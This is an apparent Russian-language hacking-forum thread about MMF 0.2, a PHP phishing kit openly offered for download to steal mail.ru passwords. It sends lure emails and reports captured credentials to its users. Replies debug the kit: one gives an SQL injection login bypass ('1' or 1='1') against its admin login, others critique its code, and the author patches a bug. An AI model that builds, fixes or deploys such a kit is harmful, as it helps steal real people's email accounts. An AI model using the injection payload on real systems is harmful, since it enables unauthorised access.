[MMF] 0.2
MMF - MultiMailFake.Скрипт служит,для создания Фейк сервисов,для кражи паролей от mail.ru\аналогов.

Возможности:
[+] -Регистрация пользователей\Личный кабинет(мульти режим)
[+] -Отправка Письма жертве прям из скрипта.(со втроенным примером)
[+] -Отправка отчетов пользователю на email(по желанию)
[+] -++ Изменен интерфейс.Местами переписан.


Вообщем пока, что скрипт простоват,но работает вполне отлично.
Писал для своего будущего сервиса,но потом желание пропало,да и дел по мимо него много.
А так как я за Опенсурс,то скрипты радушно выкладываю в паблик)

Код кривоват,но работает....
Просьба не писать комментарии,с текстом типа: а я бы сделал вот так ...
Так как мне ровно пофиг,как бы вы сделали.....



Скачать MMF 0.2 (http://depositfiles.com/files/1s8jvnkdu)

Нашел 15 минут свободного времени.Дописал.
Обновил первый пост.

Привыкли писать скрипты на error_reporting(0);

Notice: A session had already been started - ignoring session_start() in C:\wamp\www\1\regi.php on line 59

Notice: Undefined variable: POST in C:\wamp\www\1\regi.php on line 63

Notice: Undefined variable: POST in C:\wamp\www\1\regi.php on line 64

Notice: Undefined variable: POST in C:\wamp\www\1\regi.php on line 65

Во вторых:


$login = mysql_real_escape_string($_POST['login']);
$password = $_POST['password'];

$query = "SELECT `id` FROM `users` WHERE `login`='{$login}' AND `password`='{$password}' LIMIT 1";


Логин обезопасил а пароль ненадо? Ну тогда лови скуль:
Любой логин и пароль:
1' or 1='1
Авторизация проходит.

Если чесно, не в обиду, скрипт УГ)))) После скули дальнейший код не смотрел, интерес пропал.

Дебагнул...


Если чесно, не в обиду, скрипт УГ))))
Ну давай напиши лучще... Где от тебя хоть один норм релиз?
только вечно и умеешь что обсирать.....

1. Запросы = queries на английском. Базовые знания английского :)
2. Пути статические. Например, я кинул скрипт в папку MMF, а после cмены настроек, например, редирект идет на /logi.php. Так же и с формой фейка.
3. if (@$_GET['mod'] !== "logi" && @$_GET['mod'] !== "mail" && @$_GET['mod'] !== "test" && @
$_GET['mod'] !== "sett" && @$_GET['mod'] !== "delete" && @$_GET['mod'] !== "exit")
in_array ф-цию не просто так придумали :)
4. !preg_match("/^[\d]+$/i",
$_GET['page'])
is_numeric - намного проще, быстрее, удобнее, легче.
5. $vuvod
$primer

Никогда еще не видел кода с переменными на транслите русского языка.

Никогда еще не видел кода с переменными на транслите русского языка.
в большинсте пхп скриптах такое можно увидеть :)

mailbrush
я думаю нет смысла критиковать названия переменных, т.к. релиз бесплатный и выложен для того, чтобы исправить код, помочь.

имена переменный каждый задает так, как ему удобно.

есть смысл их критиковать, если скрипт выполнен на заказ, хотя ТСу ещё далеко для выполнения заказов.

Ну давай напиши лучще... Где от тебя хоть один норм релиз?
только вечно и умеешь что обсирать.....
Мальчик не выёбуйся, когда тебе указывают на ошибки, а учись выслушать и вынести с этого пользу. Я не стал писать что ты быдла кодер, я сказал что идея скрипта УГ, но судя по всему и ты тоже Г... раз неможеш адекватно воспринять критику, держы быдлан:

файл regi.php:
session_start();
Раскрытие путей через точку в сессии , исправление:
@session_start();

Нет проверки на занятость ника при регистрации:
http://img230.imageshack.us/img230/2401/pma.gif

Потому что быдло код:

$ch_login = strtolower($login);
$pass = $pass;


$sql = @mysql_query("SELECT * FROM `users` WHERE `login` = '".$ch_login."'");
if(mysql_num_rows($sql) > 0)
{
echo'Аккуант с таким логином уже зарегистрирован!<br /><br />';
}


Неработает, догадайся почему.

elseif($email and !preg_match("#^[_\.0-9a-z-]+@([0-9a-z][0-9a-z-]+\.)+[a-z]{2,6}$#", $email))
{
echo'Неверный формат email!<br /><br />';
}


Зачем ты делаеш конкатенацию строк, если используеш двойные ковычки?
mysql_query("INSERT INTO `$db_name`.`users` (`login` ,`password` ,`email`) VALUES ('".$_POST['login']."', '".$_POST['pass']."', '".$_POST['email']."');");

ЗЫ Ты юморист
$pass = $pass;

Index.php

Скуль не закрыта:

$login = mysql_real_escape_string($_POST['login']);
$password = $_POST['password'];

$query = "SELECT `id` FROM `users` WHERE `login`='{$login}' AND `password`='{$password}' LIMIT 1";


Конструкция:

$query = mysql_query("SELECT * FROM `users` ORDER BY `id` ASC");
$vsego = mysql_num_rows($query);
echo'<td class=border>Пользователей:'.$vsego.'</td><br>';

$query = mysql_query("SELECT * FROM `querys` ORDER BY `id` ASC");
$vsego = mysql_num_rows($query);
echo'<td class=border>Записей:'.$vsego.'</td>';

4 запросса!!! Хотя можно было бы:
SELECT count(*) FROM users UNION SELECT count(*) FROM querys;

Регулярки ето клёво, но не до такой степени:

if ( !isset($_GET['page']) or empty($_GET['page'])
or $_GET['page'] < 0 or !preg_match("/^[\d]+$/i",$_GET['page']) )
$show = 0;


Кстати /^[\d]+$/i модификатор i жжот в проверке на число.

Воощем в итоге я запутался в твоей писанине, непонятно зачем ты продублировал регистрацию еще и в файле logi.php


Вот еще гавнокод без проверок, делай что хочеш, просто мего сервис по тренировке хацкеров.

$query = "INSERT INTO querys(user, time, query, referer, ip, user_agent, maillogin, mailpass)
VALUES('".$login1."','".$time."','".$in_ip."','".$reftext."','".$ip."','".$otherinf."','".$login."','".$password."')";
mysql_query($query);


Вот ета часть кода у меня не заработала:
if{$row['mail_status'] = 1}{
Я заменил на if($row['mail_status'] = 1){ если ты не против.

Далее:
$mail = strtr($mail);
Warning: strtr() expects at least 2 parameters, 1 given in C:\wamp\www\1\auth.php on line 42
И вот что-то сфейлил:
Fatal error: Call to undefined function mailenc() in C:\wamp\www\1\auth.php on line 43

Там еще файл какой-то пытался скрипт открыть, но не нашел его:
$maillist = file("baza.txt");
Че за файл? Ридми нету, телепаты в отпуске.

Вообщем сил больше нету, в этом "коде" можно коментировать практически каждую 2-ю строку "кода".


Ну давай напиши лучще... Где от тебя хоть один норм релиз?
только вечно и умеешь что обсирать.....

Во-первых мне некогда писать подобные релизы, хотя я бы писал с удовольствием, но у меня нет времени, мне приходится работать, т.к. возраст 24 года. Во-вторых ты не видел все мои релизы, поетому не тебе судить. В третих я не обсираю, я указываю на ошибки, если ты в каждом критикуюшем видеш патенциального врага ето твои проблемы/комплексы.

b3, хороший анализ. В дополнениях не нужнается, т.к. действительно, слишком кривой код.

Исправь:

Я заменил на

if($row['mail_status'] == 1){

и так что мы имеем.
Из всего выше описаного я нашел толлько 1 неработающую хрень с опправкой отчетов на мыло, это то что я забыл поставить =
а остальное мое желание и мелкие недоделки.

вообщем разработка всеравно заморожена.кому нужно будет - доделает.